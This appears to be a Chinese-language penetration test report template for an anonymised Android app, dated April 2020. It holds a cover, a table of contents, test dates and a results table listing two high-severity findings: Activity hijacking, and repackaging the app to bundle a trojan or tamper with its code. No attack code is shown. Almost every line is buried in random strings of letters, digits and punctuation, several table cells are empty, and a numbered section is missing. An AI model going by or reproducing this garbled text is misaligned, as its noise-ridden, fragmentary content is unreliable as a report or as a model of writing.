2 M3 H' {0 o- T# M! \" U* T8 y+ d1 w1 v' z- |8 j
1 ~, ?! O5 v/ R; o7 i. I
o6 N/ g+ {5 H; |3 \7 r' [4 |
, H# W& v6 ]7 v1 a8 x3 d6 K
/ T& ]" o/ D% x! q
/ Z. ?, E% g$ |# i+ j9 x; [4 l
! \- z e+ J8 H4 n( v" u7 ^8 r/ f3 z% K
3 E- g B) [1 u- _; }
3 c1 i: W c0 q X3 y
5 w/ I( N, ?1 _
- m/ r( g0 M% Y8 v 文档编号:
5 O2 s) J C8 H% Z
" Y- i# q c {( C% [
! W, R4 j: m% M2 M$ J8 ]
$ g9 l9 ~' T: @, h3 w2 N# Y0 g
- u |6 u* c% m! @# C2 A; {7 a* I) J& \$ ^; m/ M* `5 R# o! w7 m7 i
3 L5 `3 a+ [0 ^ }. X1 h$ ]- K! R+ O+ l! }# Y
9 W0 h" g6 g S$ X
" }6 b) ]! W/ C9 d7 s
& m; y5 b, H; M, A+ @
& n" m3 E" Y, h, X% h* x: p
4 `8 s8 p2 ]/ g5 ^
* q4 \- y' g" z0 z4 M9 k4 ~( L
) i+ [- { P7 Z5 d# L+ F$ G
" s/ y @; V2 d1 v' w
0 V" `7 d% ^" S# g/ f& A2 Z8 s" M( P4 _3 p; l% {! O& T
j" u* J- q% I+ o
( A! |3 ~; U; b3 o8 c
. i: s0 M' w# [& z2 |# B6 B v- ?$ n3 x% s8 K1 C
8 e: s. p/ }+ Z [
* y, O9 ?. y0 w9 J) ]9 b4 t
+ K3 z: d1 d3 m, `. ~; K
, A8 E3 K. V' y7 g
" H+ X( F% R( H
3 r! t, n5 G# Y+ Q
" |2 s/ l9 M" G- ]. J/ I
) Z3 t( F8 U* V; e+ t) x 7 [3 o% q1 H/ I: N* i2 E
) @" S y+ B7 }2 n
( W# _% |5 C" w: r; _3 m* y% }; _5 i7 D: u, ?
5 s6 G. u/ T S4 r3 t) I
% A0 s' q. v4 Y( k0 l1 Z 某某某APP渗透测试
4 _5 V& v4 j/ N5 u6 ~9 K9 V; E+ |- G; [, `. m
, M( ]) j: P, J2 ?+ w3 \0 }) N- K
' I1 {/ s+ J6 c7 t
5 Z3 A# z( P, P8 N: ]- z" P
8 h/ x# A- N$ _/ u: E2 e) M
+ Z) `$ P0 x; s& r) h
# ?) U- g' X/ Y2 p5 T
# e! B; d) J5 ]$ y$ K
. ~ @( w0 Z. j& j( \
# y4 o% w: }! I3 J
& \* o5 E, ]2 j9 b2 b7 N8 c9 F% h; A$ m$ Y
* j: v7 Y7 J8 h5 o' x, H; D" e+ _* {8 A8 f2 r U
; i8 [" _: x; G, l. _) I
! w; b- n x* ?" g7 L, N2 a
! k+ E+ {! o0 m5 j z7 V! J( h- Z/ p7 M+ k0 i
+ `7 Z2 b P) O8 A! G. o0 Z/ V* `5 T* s- {
- O, \- O& X, @- q, Y# c* ] X$ N( w5 }5 B: w5 i
- R( S- a6 n$ B8 Q
$ Z( q$ P( E+ u6 ]
/ A+ ?% r# ?0 R6 X1 [% \ X. v% R2 S' P$ q0 y
2 p% S/ ?- @8 T/ a5 g( n2 ?9 [5 S+ O" P% x
技 术 报 告
Z2 {. y/ |, Z. V& K. V/ u4 h7 W, l0 \
! i8 y+ e- j3 N4 E- Q
/ [7 y( c" f, \7 A) X$ p
% j7 O/ V3 r0 g. [4 L9 ~# b3 b3 R
1 g' y E9 ?. _/ f( A7 K6 L- E 1 c* i c) d% M. D
4 u" p1 n: f9 R; o" h
6 a' ^4 j! I3 I
; l& z$ ^8 A; i: `: Q + S- {8 Z5 d0 z3 c5 G
9 c7 I* L2 p1 n3 |8 [
+ w! v# L- z+ q
7 U) W" n- n5 Q1 K0 R7 o* Z' g5 H
$ e7 `0 f3 w9 F( n
. U( s0 Y% u. D' I# ^
+ e0 Q- w' V0 Q- Z2 ]6 C
) Z9 f3 A4 ?/ C$ i- {. f
' L5 K" ^$ i. ?+ w0 \
; R- ], h* [% e: @, D, h, L
7 e+ g; W+ k. ~: a+ ?8 [
4 `) r( Y7 P2 g6 ` 4 @$ C8 Z6 S6 n( G. j6 W
( D1 I4 \) t+ I0 S! c, N. Q
$ }( }% P* P' C' J4 R# S
& g2 s0 ?# S9 M" d& b& {4 M, q) w u
6 X: O; g- [) W) l" Y
5 x- D5 I" z. C3 \' N. L$ T 0 s6 I' F" P0 Z3 a
$ v4 n. D9 n/ d s/ j& W
1 A/ Q. f! c6 z O% c! L* r0 d9 ? X: w9 [7 y9 J
) F: c3 O v8 a
9 z( Z4 B# O& z) k" j " p5 Q+ x! F0 v0 [* Z
" P9 x' n2 r4 d( B# _+ ?
( _, `9 W( ~8 C( F5 E2 \3 c6 E" T. {
. E* K, D/ P* j7 f
! I( S1 K, j; \. r5 T6 }, c/ x* ?2 O$ U: \; \8 H! }) U7 {
/ b g3 D/ G0 s+ \# }: I
6 @. }/ H" s. [8 k/ H
' @" d) N2 c6 d: T, }
0 M" z s z! S2 Y! r! q3 w4 g2 ~! f$ X
' ^$ T7 H1 K4 Q; t/ a: [9 ^* A6 f" Z- C$ _
3 ] ? V7 O. H+ ?* y5 f' v
: s; J. B( J. e7 Z
) m( i0 d2 u1 r3 H
. d- k# A8 M& W" A% P5 v7 n
% }" P; ^1 E( Z2 n: L1 \' D
' @4 n+ ]2 u! o3 C$ s % v( V. L: U- `$ n
. i* w+ J, ?+ |$ u/ j5 ]
3 I. R. K: |4 i% a& ~9 h1 k$ L& [) z2 u- M8 g" j9 F/ A) l# u
6 \0 h7 v K! |
; O7 U! _. F5 `$ ]1 | 0 M$ }7 f& _ v6 Q5 a% D. y
, s4 \6 r7 E7 a, q I- t: M
8 c% n8 I6 p" u/ s6 z1 B0 j, p* b7 R) B9 n; E! c" k [
2 @7 P0 K2 H& |% a2 F, i) A
6 L/ x. O3 s1 R% I ! y% a5 l* E* @8 u+ |
. t6 x7 Z' P8 A! b
! I/ B$ V' M/ P1 s! y t0 d# y( i- `1 `& @6 r
; E- `) I# d; j# `% ?" k* L
`: A9 u7 o I6 p5 u" ` 6 V) F2 q+ K" E' C) |
o7 J8 `/ Q7 I$ v
: ?2 w d$ |# Y5 U
: m! q0 y: H& [0 K, I6 g+ y2 F3 _; X
: X- }" v; r( ?7 B' J, g b2 _; V, ]9 h5 x+ {* ]1 i
$ e# e/ T$ F$ J& j2 u
& o. |: m @: d+ c5 k/ c/ {3 {" b, O
, I9 A+ w& V& M+ K. g5 U
# U& s0 N( U2 p9 a6 Z* P
/ T0 R# s" g1 l# Y) O
0 z2 P" ?: p; M* q1 Q r # p) ?& y0 W; {0 ?
$ [2 I* _! P. a& y4 n2 U) l1 s6 N$ ~" c ! V+ @5 P7 O5 {% |' U! a6 [
& z' z* g6 {6 k5 N5 t+ J( W
/ e$ Z" T* C& N5 N& m+ c
3 P$ j i0 e5 a2 M! |/ u
8 H `( v3 z0 Q/ t
$ H# ]9 M# j' H9 y+ w2 l' Z
( ~/ Z& c3 ~5 q3 a( M' e& P) y) Z" S( ^( Q* I' J! z& v
+ ^. t& C# n9 y% `6 [: e+ @
3 a! y9 i9 @& \1 {4 W! e/ u
0 J/ \. Z% E2 I! _2 w( g; X
0 G% U9 s+ Q/ W, W/ [ 7 ?; ]. ]( x1 P, |5 d; s K
" [# V2 o* J8 N
% W+ Y- J. V% Y' v% x
1 A) p; \5 A/ _6 \% H
+ ~3 t, q$ p& F$ h! m! N+ @% T
5 V z5 g* S. Z# }3 ^ [& e9 h
' Y/ `# E2 k1 j- C, X! j' Z% ?
& d( s( L$ t5 h' i7 h9 I- S5 `' ~$ q1 j1 _% h
5 n! k/ N. M8 q! G9 U; q3 j1 @
K5 i' {! F C% N6 {
7 R. v V+ R& ]; U8 ?! _" l1 U
% \9 i9 q+ m+ K r9 u
( h. F! j. f1 t* s9 J
' c. M2 Q% L+ H' h9 H6 l5 R$ Q
( L1 s! Z+ L. o# B Y' N& q9 P7 q% j
二〇二〇年
. W/ g# N, w+ i, H) p
f: X$ a# D$ K8 {, H1 |! |, B
, B# B5 h8 m/ O+ e" C
) M8 S# T! ]% C6 j. l9 ?0 \# y, C) a
: H7 M- j$ x, m3 ~$ I( [: ?4 S! e: W- a: Z
m/ K4 _$ `' ]+ Q. q% F; q+ l+ h$ x) Z i( n" X3 J, z ^
7 d5 R1 `" Z1 h, u" ~) G+ T( { |
- e* j" V3 D. F$ l
9 C& L- K6 r6 I5 o, {
; H3 f! W$ {% v
( X# Q2 s$ H! h- U: W6 Z$ M- `
. w, H5 E# d1 b0 m* X
1 }/ r) d2 T7 {5 X- k
7 x9 {# z: F( w4 \, [: J& u0 h- _. c
. _4 p) r/ e G4 R! ?4 j1 n, Y3 e, p& q* M" c
4 h3 j' y2 t/ `5 {
) O3 M7 Y( K/ R) A9 K h
/ M' M3 Z7 m7 i' V% D: R. e1 c: c* @ k* e5 E7 N
目 录
! F- g0 N, G' X8 `: T% Y& F/ U/ v
1 [; `% t+ m4 t, B; r7 j! C
2 {% ?1 l- v2 ]; T3 z$ z, ]3 W/ T8 ]
/ @* {) l+ M- \% Q, o
! ~. O6 _# |" G6 F& g" \
3 M4 I: C' l; V7 D& y; @( H
( v# f1 `5 [7 Q) q& {% j
: P- [ R' B3 F% E& e- x. h- P) R' w
( U" F. Y9 L( n1 R$ D
$ E# |7 `5 P8 d+ B: n
8 }$ s W* \) m: r; p+ y! J& s; \, L) L, o& o. _* ] V! t/ N
1 概述... 3
# [7 |$ j/ j7 n5 z+ q1 O" i, ^1 y( l: Y& s7 A) V% F
E" [7 {: g$ U2 ]/ s: y b g
* U6 d' t R" T8 ]+ w- Z1 [( S 3 p3 S: S; V1 @9 r- C b% I
$ |+ X+ k+ P1 y! u. v" r9 C
1.2测试时间... 3
, ~% f* u1 h9 j% J! O& L v
* S' {! a& K3 r9 s: H Q
& z. [: ]1 f2 o+ ~2 N! J5 j6 C- P$ A& Q
: Y; g) x9 K/ O" V/ j; U9 B: v( N
6 x9 f; Q- O5 t/ e w2 H S
, g3 f, k; l; { 1.3测试对象... 3 / N+ N/ ^' i4 z c- S( ?- E& m. u
9 k. b* V. M/ n
3 k8 s* } V' v( D9 n
U& n4 J& l( c, Q: s% y% f2 Y$ Z
2 C0 |2 O' x! @& i5 ?6 }& N9 y+ Z: k# T I m
1.4测试结果... 3
( @4 h1 {; R8 z+ P8 ]. k* G/ P4 V* J
* f6 O) J9 P. u, f+ Q
/ ^! p& P' u4 W: q7 m! M" P% ^
L) }( w+ l& l6 E1 m4 A
" N* d. ?% r) G3 v$ O7 b 2 检测结果... 4 , g$ y" L7 L2 Z
' c3 k- o7 \+ M1 H; J5 W
1 ]* s, m6 [- l* B. ^2 m7 H
" l) J2 g3 r- a( Z& e6 \4 |7 D
% ]) ?8 A9 w+ N- d
) k! b; d3 C, b" X, E 2.1 某某某... 4 ! K- S& }; T+ K0 c! G- V8 n8 L+ Y
* h" ?* n% Z% O- t' }- c
5 P5 ~$ M' h- H
0 n: d6 v3 ~) b5 l0 S4 e$ E: n
7 X4 b/ Q5 b" l2 E( V5 T5 x. m$ I/ Z2 b- b8 `" w( Y
2.1.1检测目标... 4 3 e' X8 h) F5 H1 o5 d
' M! z) |9 r, g
9 G8 a7 O4 ]( ]7 J0 k! M
% {" v& e; u7 F+ x' O+ z& @! ^
0 [" Q8 [: t" y, V
% @; X+ d& N/ U6 ^+ Z& F
2.1.2检测结果... 4
& O1 s2 J! I( k0 }' u
+ E1 G9 @- S) ?9 { y7 a: {) Z
% I) S+ R5 A& A" O( [/ F- i, D C' w2 `) Q6 N$ m! s' M! a
( ^* f; C- P/ A4 i8 S
' _1 i* M$ c7 P) H2 D q 2.1.2.1. 4
/ c- }0 a" ]! C8 E; V5 ?
: @0 A, E- U0 u7 e6 y5 K
8 X+ o$ d. o: r6 A4 D. Q
0 l# g7 d9 V+ p: y/ I+ b; u 2 ^- R4 q" C& H, c3 _
' `, I4 U. Q7 r( P7 ^
2.1.2.2. 6
- ^/ M' h' l% h( u* D+ A, S/ H) u& W+ p& _
7 i5 h7 {+ g$ }: C8 i% W" v( g- s: j2 D% p' m# o1 S5 k% D
+ N |% M1 D0 f# V% u: I8 z* H# P. c1 M" k3 C/ n
9 P$ p& M8 n! R% ?4 B3 X6 `
( h6 Q2 V) y* a- C7 a' W
% n7 @# d' w# B, r* e
7 z2 t/ U2 J9 p6 f& _
2 ~) \! q j0 L/ P, }9 a! A. r
7 |6 ]7 o% o5 Q( S) R; G4 j( ?: x2 I3 {
' Y" ~, u! h( }6 k6 A) q+ a4 C! q1 m2 _6 f
& I J" K1 @8 c7 U( r" l6 K/ x7 w0 |# Y( ^4 t
- T4 y5 p$ G. M3 N, |, e) M# @0 R# L; L
9 X x! g0 T0 L1 @- M
, J, _* {" X" h, w4 F1 Z/ ^ a; H0 W6 o% f" k
1 概述 # t4 Y" _; B) L& I; Y6 f: j9 U r) v. ^
% [) x5 ?! ?- x* x
6 [1 I8 l# N: a$ o1 U0 F M3 q3 a' g( J" z) t+ d+ P& P5 w
2 l/ f! c6 O. [$ Y4 {( V
6 {9 k c- i/ t 1.2测试时间
7 q4 [0 l/ D s- E; ~! B% U/ }/ J Z9 d( [8 D* X4 h8 m
: t0 G+ _' Z3 e! D x4 y! H
3 [; ?! G6 l( `' ?4 }8 g$ d 8 x* j, t- t* {" G5 Z1 ]! ~
* t! d c% V8 C# _/ y4 W
# `3 m) D7 o4 @- z
9 ]0 n1 f( U1 l2 n: }( d
( _1 O# y$ U- @! }
' x; Q4 e, s# i, M7 P | % k/ p; a2 ?6 |1 d7 c9 _( \" P
8 D- U0 i! S' i
& o! @3 {" o5 b
4 s' r/ C( v Q! _0 u# }' M& c0 ]
渗透测试时间
! P$ d# a9 G9 \
0 r, T& `/ @2 L6 _% n2 ~
' r1 K$ O& y Y, q3 @3 b& R! p1 B, X
| $ ^! o- J, E' _8 k
% c( W* D# G; o
& x/ O; e6 c! k3 Z
4 M- Y% K4 F1 S' g. C + r# p4 b5 d+ ~# G1 F7 @
0 b, g8 i- t5 o& U8 Q) M; C |
) o1 L/ e2 S/ i* w& d
0 E; u6 U( G3 n6 s1 l * m$ Y" X9 T3 ~" J1 s4 P
+ @ @- [2 M; `2 L% X9 o l! \4 k
起始时间 ) V9 a' `# d. L! w0 f4 w6 K
1 R1 y! w& M: D' }& ~+ z* T
; y0 S4 l+ x& _' F B5 C% O
2 n% f1 J G8 u& e! V6 d |
9 ~' P" p, V. b8 ^4 c
2 O( G- r1 V9 w. s8 p K $ s5 i1 b$ p! N% K6 m8 Q
& J# Q0 _, ^. D1 f3 O4 F! ~9 B0 t 3 R. u N q/ _5 t1 T3 s
' K; Y, B7 {/ M( g9 b# B 2020年4月6日
6 K0 C( @: `$ d% s6 t
( `6 e/ G, B' L! v% y+ s% }
! L! L) J5 L2 }+ R5 z8 p! L* L* N; d* t1 D, t
|
# }5 H4 j: w6 o4 x# b' [5 m# Z: G4 y; u. d) J: r* g
5 Z0 C2 d* T, M P4 L* p/ z* ]: x% Q6 U6 |% N
) ~( J+ z: [3 V @( ~2 y q
( h1 `/ C0 Q" n F. N' R
|
" x% [9 Y! J- Y5 c% ]8 o7 ^. }# }3 u- W
; T" y1 J/ b- A# g+ \
. F( @. y' R$ Z 结束时间
X# y* x: W; x: {5 A) \. Y3 N1 N( A# K8 T" d/ U
( |; h$ g+ {! f/ \1 b
v: o# e+ g3 }0 R$ p9 y; u7 t
|
' T A9 m' T4 `% W0 ]
- T. f3 K4 Q! S 2 ]! Y1 B" Q- n, Q6 Y) c1 T7 R
6 L; Y" v7 L0 D( h( e
7 ?5 J/ W9 a/ z: [6 \1 S% w9 ^: L) y4 @
2020年4月9日 ) g; T5 w: {: ^5 i
7 {$ O* F9 \9 h0 L
8 |- ~2 `. b( f
, K: {' C m( G+ Q5 D9 v( M | 5 p2 V$ l0 j* f) b, z4 g8 F2 e( H
5 \+ ^) W1 \" x7 h0 ?6 O
; R4 s1 p7 ?3 r& m3 L, {+ _9 d6 |% \
4 E. N" [ r+ S0 n# |$ ?$ G; X5 w( a# d. r$ P
0 ~ j% j8 o) z: v6 W
8 s d" y, {0 ^' |/ X* Q# {
" d( Y: H# ~4 Y5 m+ N" I0 ~% T P! n9 }7 @( x$ T+ ~0 F: P
1.3测试对象 # z ^7 r8 [2 ]: ^. ]' x
# u5 @1 t3 H+ ]+ G3 g9 j
, A$ i& }1 Q5 B- v
+ E* h6 w8 {; c- t2 i* L7 L
' l* j" x- F# _
0 h. S% D& u! l6 J& G) n {. M/ h 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 5 J# G( J; \2 I" X) K
) N: @9 r/ G3 j o. V, S0 P
0 @/ W$ O! }( x/ M6 k& T6 Q. a% U: o% F( X' q5 w
2 v' u# \/ d j) ]8 p) g+ e# U& Q9 m$ a0 @' @ q
表1-1 检测对象
9 y+ P; N o7 p+ T( U) O0 N' S1 ?% E+ F4 I" g& ?
8 Y7 [& t) [7 v2 q$ x8 E) a
' s, Q: ?0 {' k k' F8 M- O
! j9 ], u0 g4 G1 Y' h3 T+ ?* ]' ]4 q7 u. L, Z
* _& R, {- r! f! _
* m9 r; } O) F
0 D ^' k! ]" t& D3 A1 P& D1 e3 a* w- \* s# O
| 2 n2 s/ \1 t0 T3 l2 Z
2 e! }4 H" f. Y5 y
+ k. b8 [: C% I$ W8 c& k* _! J7 O5 t' p1 e& p4 G' A w1 o
序号 ! Q, P. X5 ?8 n" L' { p/ u
8 ]9 q0 k" L5 w5 P
( g& z/ x1 J" [' D; z7 i) F- I
| 9 `4 H- N4 s9 Z) U4 Q. j
) i: S3 L! { o& D+ r: U2 s 3 W3 s+ \% p' z) q! Y( n
5 {5 R$ g3 z0 L/ e# z* P E- j
9 p' k- p% c; e
1 k) u& }' G8 C
测试对象 & S/ B( r) ]* s# [" I4 h
* i- x' n) S3 G0 E2 Q3 ?
9 X# D9 H+ E- H4 b$ L) {( W! Z' ]' I! T( s! _! U
|
. W0 E0 m& |- K# m, ^ F" [& f5 z% q3 n: c
+ E: e, _; i, d% n2 ^
l. c0 U% i' x( L+ d2 X4 J 9 K; Z9 Q/ c$ z2 M0 \/ d) G$ E: q; r
1 l1 K- B# b' Q9 R
测试地址
6 K% x+ Y$ A* t/ E; C
4 O$ g. u/ b; q; x8 [ 4 ?1 M* Q) W& J, F* N9 i4 V
; D0 _! l3 a8 V/ l- Q) D e |
: z7 o E/ Y2 E& i! M9 p+ k& L3 [+ k% P% D( c" a
3 B1 Z7 H+ k& `, p, F6 ^1 l% D( ] U& S3 ^' ~7 s
2 L/ T6 L( q7 U3 P4 C* d' I- H& r8 h: b- a8 |2 \% T) l
安全漏洞 8 m) X3 i, ~) \5 z( u* z
' V' ?7 a: {- ^8 j+ j u
+ \' p' Q, m0 r% v* }. ?+ x3 f4 p+ \
2 `% b0 ?. w# H6 ]' U4 V |
* Z& l% Q% i/ E3 H% J0 { ?- L2 J, R: ~
9 a: {/ t- W+ X( C2 N4 G0 h
, R2 |6 x9 n; y' r
3 ]. p" A, X7 ^) A* c S, V+ U% p) D7 n: D, Z" ]
|
$ |! ~/ ?7 G* `; u( ]: f3 X+ j+ ^0 D6 z* r0 Q* x- F
. W4 X) v& V S; e0 f8 A2 w& o! ]9 W& g% Q" l
1
. Q# K( F, h! J0 s3 G& d) p
* y3 r4 ~: s( @2 D$ x! A- m' v 0 h5 K% c( I. E) W% I
& d+ _) y- S) v. Q6 v: y
| ! Y. P. t" C/ g( O0 H% Y# B
4 v) h3 C0 U* t' g9 m. i8 [3 ?+ K/ J
+ p# L, z8 Y) z! ]* m3 h _
3 u" ?* `8 ?: B: t
; L( `# X0 p4 M9 \! E# {( w0 u2 M W3 \- S
某某某安卓APP
; w+ E6 w& ~( e0 u5 D+ v1 N
* N2 M# E: M3 R5 Y3 h0 {$ p
3 b" m" \+ `, k7 y* ]" y: ?
/ e" h, W1 {2 t! m8 T9 c |
- ]7 f* B4 R2 b9 p; Z7 i5 `$ f8 ^1 Q' [
! ]/ j0 k* r) t' u
4 m7 `! s: O& ^- o+ l
1 d: e" |4 h* Z+ s% H
+ {5 a( h5 b2 i
, X1 p) X b& |$ O1 \' g8 I4 S
5 S( I: J R. w% L- f, `
# P/ J7 Q, H( L d- q0 [- f* {3 y% c( a2 y# U/ c
|
- k: A+ x$ Q" A
6 \# p8 k1 w1 z ' l' H- k: `2 G% W5 i' K
3 h! N4 G, d* [, U" n
3 s2 J1 ~% W6 O H2 o4 k
9 r. n! D, G7 N 2 : w# `/ @- P" e7 u% i0 `) ?
9 G Q& Q. B: O, C
% s2 W+ D. A/ ` C+ o! y9 _$ G- Y a! N. \
| ( n- h' f! s' Y9 w4 A
9 F/ B5 L* p% Q) e& x- l9 N4 o! L
- G, t; f; j+ W; z# g: L" Z6 l# f3 k+ \( i# I8 P% ?9 H
/ }. \3 v9 V. p) j. s9 S6 J! T
6 O7 ?5 E3 Q2 @! Z: M N
8 F% Z0 w T, H4 H& @5 V
3 i7 x H7 [$ M
2 N9 [* j- L+ k4 f& P- F
4 d, L2 g- `7 ] 1.4测试结果
: s M& l6 y3 B4 P h- p ^! t }1 L- y
% V/ Z. [) p* x7 y" t4 W
, T7 h. ^' r; {5 V# V
) M) p( I' q* x! X& o; q
1 \+ }; W4 u5 v$ ?( m n# | 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 V2 b- @! f8 P9 e# ?. m
0 z, b& @8 {$ s' L) Y
6 @( j+ |+ @2 O7 w
# C. ]* a* \$ D* w( y: i
1 m& J8 P7 G7 V) ^& m9 ~1 B
( |4 Y8 C7 ^% ]2 B6 j/ f 5 Q- v6 m5 L G, _+ t, r8 c0 a
. t& A, u! N" {2 x
% Y, Q$ x; r' W4 J
7 i. d P! r3 e6 E6 q) l
, }$ h( A$ _& X }9 T
5 a' g8 |5 d1 M* G2 n. D0 _9 m
1 B- T6 A; \2 O. y" H0 X- V: ?
1 Z4 E4 D$ V" G , r: N0 ^9 D! v* W
P$ q$ d1 m/ L9 B9 b ! n' ^. O5 `/ i3 S4 u8 _
2 O8 R3 J ^: \1 @4 v | 8 D7 S p8 I& ^( d' N
c! Q, b8 ], D9 {; ~
/ x6 l. r" e( l+ l3 E3 \- e0 \$ _# t3 c' g, U- a9 S, E' k( [
序号
0 g* q' h5 I# t [; }" s
/ X& ^; M8 D9 ~% b" Q5 X
4 D0 t- r( m: d$ m+ N
; T6 b8 s. C, w" d! ]( c% V& [ |
+ W% ~' ^, F8 n4 j1 [- [* t' K* e0 ?0 u& \& b
# g2 x v4 ^: u! j# v0 A& H* K6 g+ ~
( `2 ^: v3 k8 |. g2 v/ f* J O; x/ a4 E& R6 `. K
系统名称 : ^6 v* R& w2 m. U/ ~5 v# w; j2 I
% p/ e; O/ O G- d
" V$ ] t% K$ ~% H
& K4 f$ `$ }- N4 _; i
| * H, j1 h4 L' {
m X! ?- b3 y/ }
1 ?+ K( e. e( c! D
- @$ j2 n) L) z0 X, ` $ j" v( B+ s, J
; j. g& ^2 y: {6 S 漏洞名称
* T$ O* y( ~# ], s. y) J9 t1 ?; i. V1 k
7 g) o8 E! T6 u; V
- L- N- g" y' |3 x- b( v1 X
| * ?* `1 B6 _ g y
6 g9 }+ v+ ?" D& U0 M" L& Q* {2 Z% e 6 l4 K+ |( J/ | O" @; B
- }% c- T" d% o- f
$ p) O+ h$ f( |- M* D
( O( Q0 z7 l4 [! W 漏洞危害
. I# S+ Z4 S3 C0 n# C+ T. j& F2 s0 l
5 W; g6 ^7 E/ c2 U
" w1 V5 n% D% ^6 `& g
0 I& z) W- z& y n7 z1 ` | * |0 |3 X: M% }5 q" G
5 [. [8 {, X5 Q3 ?' X4 V1 I : R% U0 c& s- Q
) P7 y! t8 Z* ^4 |0 ]5 ^* ]+ @
2 ]- t9 v. g! _6 R4 y% y( G
- K" F4 |9 l' [ 修复结果
! w& P# ]. i V* t' \/ u
" _0 S4 w; @! x 5 L0 I* m( U8 \+ b
! ?! G% H1 K% b
|
9 P& _ i' T7 e' x
( y5 x$ x- B# t6 n2 I
4 X1 R/ g# f1 e6 Y {4 S! {
, z t9 M4 v+ ^6 q: C4 s; J
6 k# J, |4 D7 ~2 J) D
+ A8 J9 v$ Q9 o5 e0 e
|
5 S* r9 C# T" A- M
. w7 C+ X1 K6 }/ c9 t
- s7 J" Q6 C% @& ^' I
9 m# D. ?* g7 Q/ Z 1 3 U' Y8 x' r, ?
& i, @- t3 H2 f1 a: j
9 G9 k" O: Q: _2 z7 A' u$ t
/ h( x3 i# A) ^ |
. X+ j% I+ {+ S: K; u
( C0 ]7 P, s: z# c8 l0 ]8 H
# d) G- A) `0 x5 h/ J& m3 e# I- \! |1 q; i1 i
/ G7 ?1 _, t$ v
- n3 r+ S. n$ _) r: g+ V5 ^% d* V 某某某某某某APP " L% ]+ D2 I! S# |! m
, X8 g9 H+ O+ @5 N" T/ d: g * ~( _% K/ T- x! U3 P
4 w8 N6 ], H! e8 V |
: I2 d4 X$ V) y1 j
3 p5 u1 B* X8 d9 Q+ C & w6 ?+ B# ]3 D
! m( x4 F q& V8 D 2 L" P. h& m' b9 q
o6 T% @9 _" p9 w
Activity 劫持
+ T1 c% r" k: T- }, g& m4 ^7 f
k' p2 j" e. i$ z/ a
7 c* \9 J. r# @: w- }3 V0 W, F5 P9 {: m, S6 c9 ]+ l t
% f2 a- o) A3 v8 `$ h3 p9 J, U& p9 L3 f9 q8 h: z: }
6 m3 u5 K9 _& F2 f5 e
7 Y- h9 I, u+ S: x, }0 y
+ H% d3 R) N5 j& X' Y* ?# A' f( Y O) f
|
! E# K6 L( ?: T- v* U
i7 \0 q8 o( s. l2 d; r ( Q8 g* ^6 D. t9 J# C+ t4 e
" W1 v5 j3 c5 V! H" O0 R: G
( W- F6 A. A$ F* H+ [( n* B
, k& @( B1 L8 K; N0 k. A 高 # d& V# U& ?% m
' d. O' z3 V/ v* e8 L
6 \( e+ o& T6 D9 C
2 q4 F% A; D, P8 x* X X: ~ | $ r: K8 W& N3 x+ ^+ K
- f$ L' B5 r) O2 X5 Q% _
) C c2 A$ O0 x/ s% A, j" ^
5 A( `- `! Y; [& Y: D5 W: I9 K6 y 1 O- L. y1 b; d. l$ P% ]
* q* h- p2 [6 U+ C) K7 \9 l
) _& c! E+ J+ ^1 j1 x( j% k) C7 z% y7 w0 a4 J$ x# L1 {7 }
" i4 K* S3 i$ T% ?
( C2 c9 {# v8 B; M: L: n1 {- v |
0 S9 `+ N5 N6 _# ]4 u k U* [$ V. K0 H
6 \3 E7 p% b( V, n% N& c( P' i: H/ Z' t
7 [3 x, O- {; G8 X; t0 i 5 k& M8 X6 F$ x' D7 R
; S8 @5 }/ w( f. U) q |
L5 Y! L5 I& s/ }+ U" e5 U5 Y0 g( T9 m) k! s5 r
0 m% n$ q4 F' z- i4 r5 q. i; J/ n4 j( A3 N2 O5 P6 \
2 5 ^. l3 c4 O" r F- c
0 n! F0 L5 h; M9 s5 n1 R
9 i C6 c4 V$ Z/ t: L( Y4 {4 g! _2 b; W
|
' n6 q! M. ]0 e4 A% W: n
8 J) K3 K0 _4 L; |
+ I \$ i! v5 B+ A0 |' N4 j8 k% ]' E7 T
. V' t5 F' y9 c" N9 p K
9 I/ ?1 r. |4 o) X, v f4 { 某某某某某某APP
# K% l( Y; Y( d% n8 x5 t' v
$ L2 `! u1 }! ?8 g( k
e! s4 `/ T9 m; {5 ^( O5 a$ x( o& c5 Q. G. H9 G9 R
|
: [$ B) d0 ^, ~6 {, M3 o! C6 a4 W6 \# C' Y" F
1 O6 o% N: V, n& a# l
; P# ~0 Z/ h/ [ r1 I1 T. [
* V* v s) W" V
) v& ?$ U, E& \4 h 反编译二次打包捆绑木马、篡改APP代码 9 l. `' Y. D8 E$ c4 T! U# n
% i' |1 Q6 P# r! V& A; v0 T0 W Y. S+ | 0 u0 k- g* G+ i
, G1 W) [. U6 x% l |
: X5 g ~9 b' [2 S. _. W+ l3 i% Z; f5 ^. R
; z( i# l) Q9 `3 b2 ]8 X5 o1 I9 Q. @3 n6 a8 b
( m9 ~+ J9 l: n7 `8 w% g, T! ~
@6 G L: |7 T8 p6 `' l 高
; }7 |+ N4 j3 J+ g h
7 u4 Z( j7 N- W [1 t * \& i6 Y: t* ^- f
6 q( K/ Z. a; a* c
| # V: {3 |5 e4 ~2 X/ v: h
/ d; p; v) {0 i* a/ B/ m
( g! Y: _; N! j& |
$ c5 r e# o* v1 k: o7 L" u/ q
4 l6 M; r; i+ B. \; ^2 z/ o
* d$ [ V! S% ^1 L, s
( m! }" o! J! b% w
4 l, ]0 G* r' x' c( E 1 ^' \# p& i+ a9 x/ L# ^, _
6 U2 D0 ~- R( i1 t
|
, W& i( [; G; R8 v
3 B% z" r0 K( h5 C
6 [/ v8 t# w: W# L5 }
( h5 T, g5 W! ? N' L
# J- ^: S: ?5 b$ Q" t8 [; o' a) p0 e3 O5 y+ l5 P9 \: h
6 x- T( T; ]1 X( E6 r# a- y9 M( s' ~
6 }) _, g- _' ^3 m2 c
: U$ I0 m3 S. @- z3 [/ u
0 i( _, k* x' [) y0 o9 g( k1 Q7 l6 h
& L) e# ^) a: B# ~# R ! S1 d: l* N, h$ Y1 }% @- V
0 l. i* i0 n( B8 R" K/ l
; h) b" N2 |5 u+ [$ Q; B* Z8 W
7 x* Q4 }1 b# r
. l8 C% \% s# K
( J( Y, I4 g) w
表1-2 测试结果
3 a& R: |9 b' H [4 e
0 m5 y* R W4 S' e( \% }; p
- K2 ?3 r# r9 D8 y; a
9 T f% m7 _' Q0 s : \' x$ F6 ^: x8 T
: @' j$ U) D+ o
0 w* U+ r/ f" H1 Y
